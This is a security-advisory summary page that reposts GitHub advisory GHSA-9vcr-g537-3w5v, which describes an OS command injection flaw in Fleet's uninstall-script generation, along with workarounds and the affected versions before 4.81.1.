AI Sec Watch: A Security Intelligence Platform for AI Systems

Luu, T.J.

GHSA-9vcr-g537-3w5v: Fleet vulnerable to OS command injection in software packages

mediumvulnerability

security

Source: GitHub Advisory DatabaseMay 14, 2026CVE-2026-26191

Summary

Fleet has a vulnerability in how it handles software packages (.pkg, .deb, .rpm, .exe, .msi files) during uninstall. When a malicious package is uploaded, its metadata (information about the package) is not properly cleaned before being used to create uninstall scripts, allowing an attacker to run arbitrary commands (any code they want) with high privileges (root on macOS/Linux, SYSTEM on Windows) when the uninstall is triggered.

Solution / Mitigation

The source mentions two workarounds but no explicit fix or patch version: (1) avoid uploading software packages from untrusted or unverified sources, and (2) manually inspect and edit auto-generated uninstall scripts before deployment. An immediate upgrade is referenced as an option, but no specific patched version number is provided in this text.

Vulnerability Details

EPSS (30-day exploit probability)

EPSS: 0.0%

Patch Available

Yes

Disclosure Date

May 14, 2026

Classification

Attack SophisticationModerate

Affected Packages

github.com/fleetdm/fleet/v4@< 4.81.1 (fixed: 4.81.1)

Monthly digest — independent AI security research

Original source: https://github.com/advisories/GHSA-9vcr-g537-3w5v

First tracked: May 14, 2026 at 02:00 PM

Classified by LLM (prompt v3) · confidence: 95%